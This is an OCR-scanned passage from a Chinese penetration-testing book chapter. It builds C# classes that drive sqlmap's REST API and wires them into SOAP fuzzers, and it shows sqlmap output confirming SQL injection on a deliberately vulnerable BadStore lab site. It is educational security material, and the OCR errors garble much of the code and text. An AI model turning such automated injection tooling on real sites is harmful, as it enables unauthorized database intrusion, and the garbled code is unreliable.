一 旦 我 们 能 够 成 功 创建 任务 以 及 删除 任务 ， 束 可 创建 SqlmapManager 类 来 封闭 后 续 要 使 用 的 API 功 能 ， 比 如 设置 扫描 选 
项 、 获 取 扫 搬 结 果 。 


9.3 SqlmapManager 类 


如 清单 9-16 所 示 ，SqlmapManager 类 封装 了 调用 API 的 方法 ， 使 得 这 些 方法 易于 使 用 易于 维护 。 在 完成 本 草 所 需 的 方法 
后 ， 残 可 启动 对 给 定 URL 的 扫 拉 u， 上 监控 扫 摘 直人 至 其 结束 ， 然 后 检索 扫 搬 结果， 最 后 删除 该 任务 。 这 里 同样 要 大 量 使 用 Json.NET 
库 。 再 重复 一 次 ，session/manager 模 式 的 目的 是 将 API 的 传输 和 API 外 在 的 功能 分 开 。 这 种 模式 还 有 另外 一 个 好 处 ， 使 用 这 个 
库 的 程序 员 可 将 精力 集中 在 API 调 用 的 结果 上 。 但 是 ， 如 果 需 要 ， 程 序 员 仍 能 直接 和 会 话 区 互 。 


清单 9-16: SqlmapManager 类 


public class @SqlmapManager : IDisposable 
{ 


private @SqlmapSession session = null; 


public @SqlmapManager(SqlmapSession session) 
{ 
if (session == null) 
throw new ArgumentNullException("session"); 
session = session; 


} 
public void @Disposel() 
有 
_session.Dispose(); 
_session = null; 
} 


} 


这 里 我 们 声明 了 sqlmapManager 类 @， 并 使 其 实现 了 IDisposable 接 口 。 还 声明 了 一 个 私有 SqlmapsSession 变 量 @， 这 个 
变量 的 使 用 将 贯穿 整个 类 的 始终 。 随 后 ， 创 建 了 SqlmapManager 构 造 函 数 G@)， 该 构造 国 数 接受 SqlmapSession 变 量 ， 在 构造 函 


数 中 该 会 话 将 被 赋 给 私有 变量 session。 


最 后 ， 实 现 Dispose () 方法 @， 该 方法 实现 对 私有 SqlImapSession 变 量 的 清理 。 在 Sqlmap-Manager 的 Dispose () 方法 
中 ， 我 们 对 SqlmapSession 也 调用 Dispose () 。 可 能 你 会 感到 奇怪 ， 为 什么 需要 让 SqlmapSession 类 和 SqlmapManager 类 都 
实现 IDisposable 呢 ?这 是 因为 ， 在 引入 的 新 API 端 点 管理 器 仍 未 支持 的 情况 下 ， 程 序 员 可 能 只 想 实 例 化 一 个 SqlmapSession,， 
然后 直接 与 其 交互 。 让 两 个 类 都 实现 IDisposable 提 供 了 最 大 的 灵活 性 。 


清单 9-14 中 ， 在 测试 SqlmapSession 类 时 ,我们 只 实现 了 用 于 创建 新 任务 和 删除 一 个 现存 任务 所 必需 的 方法 。 这 里 我 们 将 


这 些 操作 作为 自 有 方法 加 到 SqlmapManager 类 中 ， 放 在 Dispose () 方法 之 前 ， 如 清单 9-17 所 示 。 
清单 9-17: 管理 sqlmap 中 任务 的 NewTask () 方法 和 DeleteTask () 方法 


public string NewTask() 


{ 
JToken tok = JObject.Parse( session.ExecuteGet("/task/new")); 
@return tok.SelectToken("taskid").ToString(); 


} 


public bool DeleteTask(string taskid) 


L 
JToken tok = Jobject.Parse(session.ExecuteGet("/task/" + taskid + "/delete")); 


@return (bool)tok.SelectToken("success"); 


} 


正如 SqlmapManager 类 所 需要 的 那样 ，NewTask () 方法 和 DeleteTask () 方法 使 得 创建 和 删除 任务 变 得 简单 。 这 些 方 
法 代码 与 清单 9-14 中 的 代码 几乎 完全 一 样 ， 只 是 这 两 个 方法 的 打印 输出 较 少 ， 在 创建 新 任务 Q@ 之 后 返回 了 任务 ID， 在 删除 任务 
之 后 返回 了 结果 (成功 或 失败 ) 。 


现在 可 用 这 些 新 方法 来 重 写 前 面 测试 SqlmapSession 类 的 命令 行 应 用 程序 ， 如 清单 9-18 所 示 。 
清单 9-18: 重 写 使 用 SqlmapManager 类 的 应 用 程序 


public static void Main(string[] args) 


{ 
string host = args[0|]; 
int port = int.Parse(args[1]); 
using (SqlmapManager mgr = new SqlmapManager(new SqlmapSession(host, port))) 


string taskID = mgr.@NewTask(); 


Console.WriteLine("Created task: ”+ taskID); 
Console.WriteLine("Deleting task"); 
bool success = mgr.@DeleteTask(taskID); 


Console.WriteLine("Delete successful: ”+ success); 
} //clean up and dispose manager automatically 


} 


看 一 眼 束 可 知道 ， 相 比 起 清单 9-14 中 原来 的 应 用 程序 ， 这 些 代 码 读 起 来 更 为 直观 ， 并 且 更 易于 理解 。 我 们 用 NewTask () 
方法 @ 和 DeleteTask() 方法 @ 来 替换 了 创建 和 删除 任务 的 代码 。 如 果 仪 仅 只 阅读 这 些 代 码 ， 你 无 法 知道 是 API 用 HTTP 来 作为 
传输 手段 还 是 我 们 在 处 理 JSON 了 响应 。 


9.3.1 列 出 sqlmap 选 项 


如 清单 9-19 所 示 ， 我 们 要 实现 的 下 一 个 方法 用 来 检索 任务 的 当前 选项 。 必 须要 注意 的 一 件 事情 是 ， 由 于 sqlmap 是 用 Python 
编写 的 ， 所 以 sqlmap 是 弱 类 型 的 。 也 束 是 说 有 些 响应 会 混合 多 种 类 型 ， 对 于 强 类 型 的 C# 来 说 ， 处 理 起 来 有 点 困难 。JSON 需 要 
所 有 的 键 都 是 字符 串 ， 但 是 在 JSON 中 这 些 键 的 值 可 以 是 不 同 的 类 型 ， 比 如 整数 、 浮 点 数 、 布 尔 类 型 ， 以 及 字符 串 等 类 型 。 对 我 
们 来 说 ， 这 总 味 着 我 们 必须 将 所 有 值 看 作 C# 侧 可 用 的 一 般 类 型 。 要 实现 这 个 目的 ， 在 需要 知道 这 些 值 的 类 型 之 前 我 们 都 将 其 都 


看 作 税 单 的 对 象 。 


清单 9-19: GetOptions () 方法 


public Dictionary<string, object> @GetOptions(string taskid) 
{ 


Dictionary<string, object> options = @new Dictionary<string, object>(); 
JObject tok = JObject.@Parse( session.ExecuteGet ("/option/" + taskid + "/list")); 
tok = tok["options"] as JObject; 


@foreach (var pair in tok ) 
options.Add(pair.Key, @pair.Value); 


return @options; 


} 


清单 9-19 中 的 GetOptions () 方法 @ 只 接受 一 个 参数 : 要 检索 选项 的 任务 IiD。 与 清单 9-5 中 用 curl 测 试 sqlmap API 时 使 用 
的 端点 一 样 ， 这 个 方法 也 使 用 相同 的 API 端 点 。 通 过 实例 化 一 个 新 Dictionary 对 象 @ 开 始 这 个 方法 ，Dictionary 对 象 键 名 必须 为 
字符 串 ， 但 其 键 值 可 保存 任何 类 型 的 对 象 。 在 发 起 对 options 端 点 的 APIl 调 用 并 且 和 解析 其 响应 @ 之 后 ， 循 环 @ 遍 历 APl JSON 响 应 
中 的 键 / 值 对 ， 将 它们 加 到 options 字 典 @ 中 。 最 后 ， 返 回 任务 当前 的 options 集 合 @， 确 保 之 后 启动 扫描 时 可 更 新 并 使 用 这 些 


options 集 合 。 

我 们 将 在 即将 实现 的 StartTask () 方法 中 使 用 这 个 options 字 典 ， 将 options 作 为 一 个 参数 传 入 方法 然后 用 其 来 启动 任务 。 
首先 ， 在 调用 mgr.NewTask () 之 后 但 在 用 mgr.DeleteTask () 删除 任务 之 前 ， 向 控制 从 应 用 程序 继续 添加 清单 9-20 所 示 的 代 
码 行 。 


清单 9-20: 附加 a 到 main 应 用 程序 用 于 检索 并 输出 当前 任务 选项 的 代码 行 


Dictionary<string, object> @options = mgr.GetOptions(@taskID); 


@ foreach (var pair in options) 
Console.WritelLine("Key: ”+ pair.Key + "\t:: Value: 


+ pair.Value); 


在 这 段 代码 中 ，tasklD 作 为 一 个 参数 提交 给 GetOptions () @， 返 回 的 options 字 典 被 赋 给 一 个 新 的 Dictionary 变 量 ， 这 个 
变量 也 叫 options@。 这 段 代码 随后 遍历 options， 并 输出 每 一 个 键 / 值 对 @。 增 加 完 这 些 代码 行 后 ， 在 IDE 或 控制 台中 重新 运行 
你 的 应 用 程序 ， 你 应 该 能 在 控制 台 上 看 到 输出 的 可 设置 选项 及 其 当前 值 的 完整 列表 。 如 清单 9-21 所 示 。 


清单 9-21: 用 GetOptions () 检索 任务 选项 后 在 屏幕 上 输出 


$ mono ./ch9 automating sqlmap.exe 127.0.0.1 8775 


Key: crawlDepth ::Value: 

Key: osShell : :Value: False 

Key: getUsers : :Value: False 

Key: getPasswordHashes  ::Value: False 
Key: excludeSysDbs : :Value: False 
Key: uChar : :Value: 

Key: regData : :Value: 

Key: prefix : :Value: 

Key: code : :Value: 

--SNip-- 


既然 能 够 查看 任务 的 选项 ， 是 时 候 开始 执行 扫 摘 了 。 


9.3.2 ”编写 执行 扫 拍 的 方法 


现在 开始 准备 扫描 任务 。 在 options 字 典 中 ， 有 一 个 叫 作 url 的 键 ， 该 键 就 是 我 们 要 测试 SQL 注入 的 URL。 将 修改 后 的 
Dictionary 传 给 新 创建 的 startTask () 方法 ， 由 其 将 这 个 字典 作为 JSON 对 象 传 给 端点 ， 并 在 任务 开始 时 使 用 这 些 新 选项 。 


如 清单 9-22 所 示 ， 因 为 Json.NET 库 为 我 们 考虑 所 有 的 序列 化 和 反 序 列 化 问题 ， 所 以 用 了 这 个 库 后 使 得 StartTask () 方法 非 


| 
叫 人 简短。 


清单 9-22: StartTask () 方法 


public bool StartTask(string taskID, Dictionary<string, object> opts ) 


{ 


string json = JsonConvert.@SerializeObject(opts); 
JToken tok = JObject.@Parse(session.ExecutePost("/scan/"+taskID+"/start", json)); 
@return(bool)tok.SelectToken("success"); 


用 Json.NET 的 JJONConvert 类 来 将 整个 对 象 转化 为 JJON。 使 用 该 类 的 Serialize-Object () 方法 @@， 将 options 字 典 转换 
为 可 友人 运 给 端点 的 JSON 字 符 串 。 随 后 ， 我 们 友 起 APl 请 求 ， 并 解析 得 到 的 JSON 喘 应。 最 后 ， 从 JSON 响 应 返回 @success 键 的 
值 ， 当 然 我 们 都 希望 这 个 值 为 true。 这 个 JSON 键 在 API 调 用 的 响应 中 应 该 是 一 直 存 在 的 ， 在 任务 成 功 局 动 时 ，success 键 的 值 为 
true; 在 任务 没有 启动 时 ，success 键 的 值 就 为 false。 


知道 任务 何 时 结束 也 是 非常 有 用 的 。 通 过 这 种 方式 ， 可 知道 何 时 能 得 到 任务 的 完整 日 志 ， 何 时 要 删除 任务 。 为 了 获取 任务 的 
状态 ， 我 们 实现 了 一 个 简单 的 类 (如 清单 9-23 所 示 ) ， 用 于 描述 从 /scan/taskid/status API 端 点 获取 的 sqlmap 状 态 响 应 。 尽 管 
该 类 是 一 个 非常 短 的 类 ， 如 果 你 喜欢 仍 可 将 其 加 到 一 个 新 的 类 文件 中 。 


清单 9-23: SqlmapStatus 类 


public class SqlmapStatus 


{ 


@public string Status { get; set; } 
@public int ReturnCode { get; set; } 


} 


由 于 默认 情况 下 ， 每 个 类 都 有 一 个 公有 的 构造 国 数 ， 所 以 对 于 sqlmapstatus 类 而 言 ， 不 需要 为 其 定义 构造 函数 。 在 该 类 中 
我 们 定义 了 两 个 公有 属性 : 一 个 是 字符 串 类 型 的 状态 消息 @@， 一 个 是 整 型 的 返回 代码 @。 为 了 获取 任务 的 状态 并 仔 到 
SqlmapStatus 中 ， 我 们 实现 了 GetScanStatus 方 法 ， 访 方法 以 taskid 作 为 输入 ， 返 回 一 个 SqlmapStatus 对 象 。 


GetScanStatus () 方法 如 清单 9-24 所 示 。 


清单 9-24: GetScanStatus () 方法 


public SqlmapStatus GetScanStatus(string taskid) 
{ 
JObject tok = JObject.Parse( session.@ExecuteGet("/scan/" + taskid + "/status")); 


SqlmapStatus stat = @new SqlmapStatus(); 


stat.Status = (string)tok["status" |]; 


if (tok["returncode"|].Type != JTokenType.Nul1@ ) 
stat.ReturnCode = (int)tok["returncode"|; 


@return stat; 


我 们 用 前 面 定 义 的 ExecuteGet () 方法 来 检索 /scan/taskid/status API 端 点 @， 返 回 一 个 包含 任务 扫描 状态 信息 的 JSON 对 
和 象 D@。 在 调用 API 端 点 之 后 ， 创 建 一 个 新 的 SqlmapStatus 对 象 ， 将 从 API 调 用 获取 的 状态 值 赋 给 Status 属 性 。 如 果 变 量 
returncode 的 JSON 值 不 是 null@， 就 将 其 转换 为 整 型 ， 并 赋 给 ReturnCode 属 性 。 最 后 将 Sqlmapstatus 对 象 返 回 @ 给 调用 者 。 


9.3.3 ”新 的 Main () 方法 


下 面 将 向 命令 行 应 用 程序 增加 新 逻辑 ， 从 而 对 Badstore 网 站 存在 漏洞 的 gearch 页 面 进行 扫描 并 监控 扫 搞 状态 ， 第 2 章 曾 经 
利用 过 这 个 页 面 的 漏洞 。 首 先 ， 在 Main () 方法 中 调用 DeleteTask 之 前 增加 如 清单 9-25 所 示 的 代码 。 


清单 9-25: 在 sqlmap 应 用 程序 main 方 法 中 局 动 扫描 并 监控 该 扫 摘 直 全 结束 


options| “url | = @"http://192.168.1.75/cgi-bin/badstore.cgi?" + 
“searchquery=fdsa&action=search ; 


@mgr.StartTask(taskID, options); 
@SqlmapStatus status = mgr.GetScanStatus(taskID); 


@while (status.Status != "terminated") 


{ 
System.Threading.Thread.Sleep(new TimeSpan(0,0,10)); 


status = mgr.GetScanStatus(taskID); 
} 


© Console.WriteLine("Scan finished!"); 


将 IP 地 址 @ 蔡 换 为 要 扫描 的 BadStore 了 网 站 的 地 址 。 应 用 程序 在 给 options 字 典 中 的 url 键 赋值 之 后 ， 将 用 新 选项 @ 局 动 任 


务 ， 获 取 扫 摘 的 状态 @ (此 时 的 状态 应 该 是 running) 。 接 着 ， 应 用 程序 将 一 直 循 环 @ 直 到 扫描 的 状态 为 terminated， 这 意味 着 
扫描 已 经 结束 。 当 应 用 程序 退出 循环 后 ， 打 印 输出 “Scan finished! ” (扫描 结束 ) @。 


9.4 扫 拍 报 重 


如 果 要 查看 sqlmap 能 人 否 利用 仓 在 漏洞 的 参数 ， 束 需要 创建 一 个 3qlmapLogltem 类 来 检索 扫 拉 日志， 如 清单 9-26 所 示 。 


清单 9-26: SqlmapLogltem 类 


public class 9qlmapLogItem 


public string Message { get; set; } 
public string Level { get; set; } 
public string Time { get; set; } 


类 只 有 三 个 属性 ， 即 Message、Level 和 Time。Message 属 性 包含 了 摘 述 日 志 项 目的 消息 。Level 属 性 控制 sqlmap 在 报 
告 中 输出 多 少 信息 ， 该 属性 的 值 可 以 是 Error、Warn 或 者 Info。 每 个 日 志 项 目的 级 别 只 能 是 上 述 级 别 中 的 某 一 个 ， 这 使 得 后 续 搜 
索 特定 类 型 的 日 志 项 目 时 变 得 容易 (举例 而 言 ， 比 如 你 只 想 输出 错误 (error) 级 别 的 项 目 而 不 想 输出 告警 或 信息 类 的 项 目 ) 。 
Warn 一 般 是 指 某 些 事情 看 起 来 有 问题 但 sqlmap 仍 能 继续 运行 ， 但 Error 一 般 是 致命 的 。 信 息 类 的 项 目 一 般 只 是 : 有 关 扫 描 在 做 
什么 或 皮 现 什么 的 一 些 基础 信息 ， 比 如 正在 测试 的 注入 类 型 。 最 后 ，Time 是 项 目 记 录 的 时 间 。 


下 面 ， 我 们 实现 GetLog () 方法 来 返回 这 些 SqlmapLogltems 列 表 ， 然 后 通过 对 /scan/taskid/log 端 点 执行 GET 请 求 来 检索 
这 些 日 志 ， 如 清单 9-27 所 示 。 


清单 9-27: GetLog () 方法 


public List<9qlmapLogItem> GetLog(string taskid ) 


JObject tok = JObject.Parse(session.@ExecuteGet("/scan/" + taskid + "/log")); 
JArray items = tok ["log"|]@ as JArray; 
List<9qlmapLogItem> logItems = new List<SqlmapLogItem>(); 
@foreach (var item in items) 
| 
@SqlmapLogItem i = new 9qlmapLogItem( ) ; 
i.Message = (string)item[ "message" |] ; 
i.Level = (string)item["level"|]; 
i.Time = (string)item[ "time"]; 
logItems .Add(i); 


@return logItems; 


} 


GetLog() 方法 中 首先 要 做 的 是 友 起 对 疾 扣 @ 的 请 求 ， 将 请 求解 析 为 JObject。Log 键 扣 以 一 个 项 目 数组 作为 其 值 ， 因 此 我 
们 用 as 操作 符 将 其 值 转化 为 JArray， 然 后 赋 给 变量 itemsG@。 这 是 我 们 第 一 次 看 到 as 操作 待 。 使 用 as 的 主要 原因 是 为 了 代码 的 可 
读 性 ，as 操 作 符 与 显 式 转 换 的 主要 不 同 点 在 于 ， 如 果 as 表 达 式 左边 的 对 象 不 能 转换 为 右边 的 类 型 ， 那 么 as 操 作答 将 返回 null。 你 
不 能 将 as 操 作答 用 于 数值 类 型 ， 因 为 数值 类 型 不 能 是 null。 


在 得 到 日 志 项 目的 数组 之 后 ， 我 们 创建 了 一 个 SqlmapLogltems 的 列表 。 我 们 循环 遍历 数组 中 的 每 个 项 目 ， 对 应 每 个 项 目 实 
例 化 一 个 新 的 SqlImapLogltems 对 象 @@。 然 后 将 sqlmap 所 返回 的 日 志 项 目 中 的 值 赋 给 这 个 新 对 销 。 最 后 ， 将 日 志 项 目 加 到 列表 
中 ， 并 向 调用 方法 返回 这 个 列表 @)。 


9.5 目 动 化 执行 一 个 完整 的 sqlmap 扫 拍 


在 扫 摘 结束 后 我 们 将 从 控制 台 应 用 程序 调用 GetLog () 方法 ， 将 日 志 消 息 输出 到 屏幕 上 。 现 在 应 用 程序 的 逻辑 应 如 清单 9- 
28 所 示 。 


清单 9-28: 调用 sqlmap 自 动 对 某 一 URL 进 行 扫描 的 完整 Main () 方法 


public static void Main(string[ |] args ) 
using (SqlmapSession session = new SqlmapSession("127.0.0.1", 8775)) 
using (SqlmapManager manager = new SqlmapManager(session)) 
string taskid = manager.NewTask(); 


Dictionary<string, object> options = manager.GetOptions(taskid); 
options["url"|] = args[0|]; 
options["flushSession"| = true; 


manager.StartTask(taskid, options); 


SqlmapStatus status = manager.GetScanStatus(taskid); 
while (status.Status != "terminated") 


{ 


System.Threading.Thread.Sleep(new TimeSpan(0,0,10)); 
status = manager.GetScanStatus(taskid); 


} 

List<SqlmapLogItem> logItems = manager.@GetLog(taskid); 
foreach (SqlmapLogItem item in logItems) 
@Console.WriteLine(item.Message); 


manager.DeleteTask(taskid); 


在 将 对 Getlog () @@ 的 调用 加 到 sqlmap 主 应 用 程序 末尾 后 ， 就 可 递归 访问 日 志 消 息 ， 将 其 打印 输出 到 屏幕 上 @， 这 样 就 可 
知道 扫描 任务 什么 时 候 结 束 。 现 在 我 们 总 算 可 以 执行 一 个 完整 的 sqlmap 扫 描 并 检索 扫描 结果 了 。 将 BadStore 网 站 URL 传 递 给 应 
用 程序 ， 该 应 用 程序 再 将 扫描 请 求 发 送 给 sglmap。 扫 描 结果 看 起 来 如 清单 9-29 所 示 。 


清单 9-29: 对 一 个 存在 漏洞 的 BadStore 网 站 URL 执 行 sSqlmap 应 用 程序 


$ ./ch9 automating sqlmap.exe "http://10.37.129.3/cgi-bin/badstore.cgi? 
searchquery=fdsa&action=search" 

flushing session file 

testing connection to the target URL 

heuristics detected web page charset “windows-1252 

checking if the target is protected by some kind of WAF/IPS/IDS 

testing if the target URL is stable 

target URL is stable 

testing if GET parameter ‘searchquery is dynamic 

confirming that GET parameter “Searchquery is dynamic 

GET parameter ‘searchquery is dynamic 

heuristics detected web page charset ‘ascii' 

heuristic (basic) test shows that GET parameter 'searchquery' might be 
injectable 

(possible DBMS: 'MySOQL') 

--SNn1ip-- 

GET parameter 'searchquery@ seems to be ‘MySQOL <= 5.0.11 OR time-based blind 
(heavy query)' injectable 

testing 'Generic UNION query (NULL) - 1 to 20 columns’ 

automatically extending ranges for UNION query injection technique tests as 
there is at least one other (potential) technique found 

ORDER BY technique seems to be usable. This should reduce the time needed to 
find the right number of query columns. Automatically extending the range for 
current UNION query injection technique test 

target URL appears to have 4 columns in query 

GET parameter 'searchquery@' is 'Generic UNION query (NULL) - 1 to 20 
columns injectable 

the back-end DBMS is MySOLO 


程序 确实 奏效 了 ! sqlmap 的 输出 非常 详细 ， 可 能 会 使 得 对 此 不 熟悉 的 人 感到 困惑 。 尽 管 很 难 领会 ， 但 是 有 些 关 键 点 还 是 需 
要 注意 下 。 正 如 你 在 输出 中 看 到 的 ，sqlmap 发 现 searchquery 参 数 存 在 一 个 基于 时 间 的 SQL 注入 漏洞 @@， 还 发 现 一 个 基于 
UNION 的 SQL 注入 @， 并 且 友 现 数据 库 是 MySQLG@。 其 他 消息 是 一 些 有 关 sqlmap 扫 描 过 程 中 所 作 所 为 的 信息 。 通 过 这 些 结 
果 ， 我 们 可 以 明确 地 说 这 个 URL 至 少 存 在 两 种 类 型 的 SQL 注入 漏洞 。 


9.6 将 sqlmap 和 SOAP 漏 洞 测试 程序 集成 在 一 起 


现在 我 们 已 经 知道 如 何 用 sqlmap APl 来 检查 一 个 URL， 并 对 友 现 的 漏洞 加 以 利用 。 在 第 2 章 和 第 3 章 中 ， 我 们 编写 了 一 些 漏 
洞 测试 程序 ， 用 于 对 SOAP 端 点 和 JSON 请 求 中 可 能 存在 漏洞 的 GET 请 求 和 POST 请 求 进行 测试 。 我 们 可 利用 漏洞 测试 程序 收集 的 
言 息 来 调用 sqlmap， 只 需 几 行 额外 代码 残 能 及 现 可 能 的 漏洞 ， 充 分 验证 漏洞 的 有 效 性 并 利用 这 些 漏洞 友 起 攻击 。 


9.6.1 在 SOAP 漏 洞 测试 程序 中 增加 sqlmap GET 请 求 文 持 


在 SOAP 漏 洞 测试 程序 中 只 有 两 种 类 型 的 HTTP 请 求 : GET 请 求 和 POST 请 求 。 首 先 ， 为 我 们 的 测试 程序 增加 GET 请 求 支持 ， 
这 样 程序 束 能 同 sqlmap 友 送 包 售 GET 参 数 的 URL。 我 们 也 希望 能 够 告诉 sqlmap 我 们 认为 哪个 参数 可 能 存在 漏洞 。 我 们 在 SOAP 
漏洞 测试 控制 从 应 用 程序 的 最 后 增加 TestGetRequestWithSqlmap () 和 TestPostRequestWithSqlmap () 两 个 方法 ,分 别 用 
于 测试 GET 请 求 和 POST 请 求 。 稍 后 我 们 也 将 用 这 两 个 万 法 来 更 新 FuzzHttpGetPort () 、FuzzSoapPort () 以 及 


FuzzHttpPostPort () 方法 。 
首先 让 我 们 从 编写 TestGetRequestWithSqlmap () 方法 开始 ， 如 清单 9-30 所 示 。 


清单 9-30: TestGetRequestWithSsqlmap () 方法 的 前 半 部 分 


static void TestGetRequestWithSqlmap(string url, string parameter) 
{ 


Console.WritelLine("Testing url with sqlmap: ”+ ur]l); 
@using (SqlmapSession session = new SqlmapSession("127.0.0.1", 8775)) 


using (SqlmapManager manager = new SqlmapManager(session)) 


@string taskID = manager.NewTask(); 

@var options = manager.GetOptions(taskID); 
options[ "url"|] = url; 
options["level"] = 1; 
options["risk"] = 1; 
options["dbms"] = @"postgresql",; 
options["testParameter"| = @parameter; 
options["flushSession"|] = true; 


manager.@StartTask(taskID, options); 


这 个 方法 的 前 半 部 分 创建 了 Sqlmapsession@O 和 SqlmapManager 对 象 ， 分 别 叫 作 session 和 manager。 然 后 创建 了 一 个 这 
任务 @， 检 索 并 设置 我 们 扫描 的 sqlmap 选 项 @。 因 为 我 们 知道 SOAP 服 务 使 用 的 是 PostgreSQL 数 据 库 ， 所 以 我 们 将 DBMS 明 确 
地 设置 为 PostgreSQL@)。 这 样 由 于 只 需 测试 PostgreSQL 有 效 载 傈 ， 束 可 以 节省 一 些 时 间 和 市 完 。 在 前 面 我 们 用 一 个 单 引 号 对 其 
中 的 参数 进行 测试 并 且 收 到 从 服务 器 返回 的 错误 之 后 ， 就 将 testParameter 选 项 设置 成 我 们 认为 存在 漏洞 的 那个 参数 @。 随 后 将 
任务 ID 和 扫描 选项 传 给 manager 的 StartTask () 方法 @， 从 而 启动 扫描 。 


清单 9-31 评 细 介 绍 了 TestGetRequestWithsqlmap () 方法 的 下 半 部 分 ， 这 些 代码 与 清单 9-25? 中 的 代码 类 似 。 


清单 9-31: TestGetRequestWithSqlmap () 方法 的 下 半 部 分 


SqlmapStatus status = manager.GetScanStatus(taskid); 
while (status.Status != @"terminated") 


{ 


System.Threading.Thread.Sleep(new TimeSpan(0,0,10)); 
status = manager.GetScanStatus(taskID); 


} 


List<9qlmapLogItem> logItems = manager.@GetLog(taskID); 


foreach (SqlmapLogItem item in logItems) 
Console.@WritelLine(item.Message); 


manager.@DeleteTask(taskID ) ; 


} 
} 
} 


正如 我 们 在 最 初 的 测试 应 用 程序 中 所 做 的 那样 ， 这 个 方法 的 下 半 部 分 监控 扫 摘 直 全 其 结束 。 因 为 在 前 面 已 经 写 过 类 似 的 代 
码 ， 这 里 不 再 逐 行 介绍 。 在 等 到 扫 摘 运行 结束 之 后 @@， 我 们 使 用 GetLog () 方法 @ 来 查看 扫 摘 结果 。 然 后 将 扫 摘 结果 输出 到 屏 


幕 上 供用 户 查 看 G)。 最 后 ， 将 任务 ID 传 给 DeleteTask () 方法 @， 删 除 该 任务 。 


9.6.2 ”增加 sqlmap POST 请 求 支持 


相 比 而 言 ，TestPostRequestWithSqlmap () 方法 稍微 有 点 复杂 。 浓 单 9-32 列 出 了 这 个 方法 的 一 些 起 始 行 。 


清单 9-32: TestPostRequestWithSqlmap () 方法 的 起 始 行 


static void TestPostRequestWithSqlmap(@string url, string data, 
string soapAction, string vulnValue) 


{ 


@Console.WritelLine("Testing url] with sqlmap: ”+ ur]); 
@using (SqlmapSession session = new SqlmapSession("127.0.0.1", 8775)) 


using (SqlmapManager manager = new SqlmapManager(session)) 


@string taskID = manager.NewTask(); 
var options = manager.GetOptions(taskID); 
options[ "url"|] = url; 
options["level"|] = 1; 
options["risk"] = 1 


[ 

[ ; 
options["dbms"] = "postgresql"; 
options["data"] = data.@Replace(vulnValue, "*").Trim(); 
options["flushSession"| = "true"; 


TestPostRequestWithSqlmap () 方法 接受 四 个 参数 四 。 第 一 个 参数 是 要 友 送 给 sqlmap 的 URL。 第 二 个 参数 是 要 放 在 
HTTP 请 求 post body 中 的 数据 一 POST 参数 或 SOAP XML 文件 。 第 三 个 参数 是 要 在 HTTP 请 求 的 SOAPAction 头 中 传递 的 值 。 
最 后 一 个 参数 是 存在 漏洞 的 特定 值 。 在 被 友 送 给 sqlmap 开 始 漏 洞 测试 之 前 ， 从 第 二 个 参数 开始 的 数据 都 用 星 号 代 蔡 。 


在 向 屏幕 打印 消息 告诉 用 户 要 测试 哪 一 个 URL 之 后 @， 我 们 创建 了 SqlmapSession 和 SqlmapManager 对 象 @。 然 后 就 像 前 
面 一 样 ， 创 建 一 个 新 任务 ， 并 设置 当前 的 任务 选项 @)。 要 特别 注意 data 选 项 @。 这 里 正 是 我 们 用 星 号 替换 post 数 据 中 存在 漏洞 
数值 的 地 方 。 在 sqlmap 中 星 号 是 一 个 特殊 的 符号 ， 这 个 符号 表示 : 不 用 对 数据 进行 任何 智能 解析 ， 只 需 在 该 特定 方位 搜索 SQL 
注入 即 可 。 


在 开始 任务 之 前 我 们 还 需要 设置 另外 一 个 选项 。 需 要 将 请 求 中 的 HTTP 头 里 面 的 Content 类 型 和 SOAP 活 动 设 为 正确 值 。 否 
则 ， 服 务 器 将 返回 500 错 误 。 如 清单 9-33 所 示 ， 这 正 是 该 方法 下 一 部 分 代码 要 做 的 事情 。 


清单 9-33: 在 TestPostRequestWithSsqlmap () 方法 中 设置 正确 的 HTTP 头 


string headers = string.Empty; 
if (!string.@IsNullOrWhitespace(soapAction)) 

headers = "Content-Type: text/xml \nSOAPAction: ”+ @soapAction; 
BLSE 

headers = “Content-Type: application/x-www-form-urlencoded'; 


options[ "headers"| = @headers; 


manager.StartTask(taskID, options); 


如 果 soapAction 变 量 @ (该 变量 存放 要 在 SOAPAction 头 中 使 用 的 值 ， 以 告诉 SOAP 服 务 器 要 执行 的 操作 ) 为 null， 或 者 是 

个 空 字符 串 四 ， 那 么 我 们 融 假 设 这 不 是 一 个 XML 请 求 而 是 一 个 POST 参数 请 求 。 后 面 吏 只 需 把 Content-Type 设 置 为 -www- 
form-urlencoded 即 可 。 但 是 如 果 SOAPAction 不 是 一 个 空 字符 串 ， 融 应 该 假设 我 们 要 处 理 的 是 一 个 XML 请 求 ， 随 后 融 将 
Content-Type 设 置 为 text/xml， 并 将 soapAction 变 量 的 值 添加 到 SOAPAction 头 。 在 将 扫描 选项 中 的 头 部 正确 设置 完毕 之 后 
@， 我 们 就 要 将 任务 ID 以 及 选项 传 给 StartTask () 方法 。 


如 清单 9-34 所 示 ， 方 法 的 剩余 部 分 看 起 来 比较 熟悉 。 这 些 代 码 只 是 监控 扫描 ， 返 回 扫 摘 结果 ， 与 
TestGetRequestWithSqlmap () 万 法 非常 类 似 。 


清单 9-34: TestPostRequestWithSqlmap () 方法 的 最 后 几 行 代码 


SqlmapStatus status = manager.@Qet9can9Status(taskID ) ; 
while (status.Status != "terminated") 


System.Threading.Thread.@Sleep(new TimeSpan(0,0,10)); 


status = manager.GetScanStatus(taskID); 
} 


List<9qlmapLogItem> logItems = manager.®@GetLog(taskID); 


foreach (SqlmapLogItem item in logItems) 
Console. @WritelLine(item.Message); 


manager.@DeleteTask(taskID); 


} 
} 
} 


这 些 代码 和 清单 9-25 中 的 代码 非常 相似 。 用 GetScanStatus () 万 法 @ 来 检索 任务 的 当前 状态 ， 如 果 任 务 状态 是 未 结束 ， 则 
休眠 10 秒 @O， 然 后 再 次 获取 任务 的 状态 。 一 旦 任务 结束 ， 获 取 输 出 的 日 志 项 目 @， 然 后 对 每 一 个 日 志 项 目 递 归 循 环 ， 打 印 输出 
日 志 消 息 @@。 最 后 ， 在 完成 所 有 工作 后 删除 任务 @。 


9.6.3 ”调用 新 编写 的 万 法 


要 完成 我 们 的 工具 ， 还 需要 在 SOAP 漏 洞 测试 程序 中 从 其 各 自 漏洞 测试 方法 调用 这 些 新 编写 的 方法 。 首 先 ， 更 新 第 3 章 编写 
的 FuzzSoapPort () 方法 ， 在 if 语句 中 增加 调用 TestPostRegquestWithsgqlmap () 的 方法 ， 这 里 的 if 语 句 用 于 测试 是 否 出 现 因 
为 漏洞 测试 导致 的 语法 错误 ， 如 清单 9-35 所 示 。 


